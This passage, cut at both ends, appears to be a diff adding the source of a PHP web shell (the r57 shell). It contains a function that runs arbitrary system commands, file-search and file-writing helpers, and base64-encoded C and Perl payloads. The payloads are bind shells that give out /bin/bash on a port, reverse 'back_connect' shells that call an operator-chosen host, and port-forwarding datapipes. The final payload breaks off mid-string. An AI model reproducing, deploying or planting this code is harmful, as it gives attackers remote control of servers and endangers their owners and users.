SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if($windows&&!$safe_mode) + { + $uname = ex("ver"); + if(empty($uname)) { $safe_mode = 1; } + } +else if($unix&&!$safe_mode) + { + $uname = ex("uname"); + if(empty($uname)) { $safe_mode = 1; } + } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1079;&#1072;&#1087;&#1080;&#1089;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083; '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1087;&#1088;&#1086;&#1095;&#1080;&#1090;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083; '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "&#1053;&#1077; &#1091;&#1076;&#1072;&#1083;&#1086;&#1089;&#1100; &#1089;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100; "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK 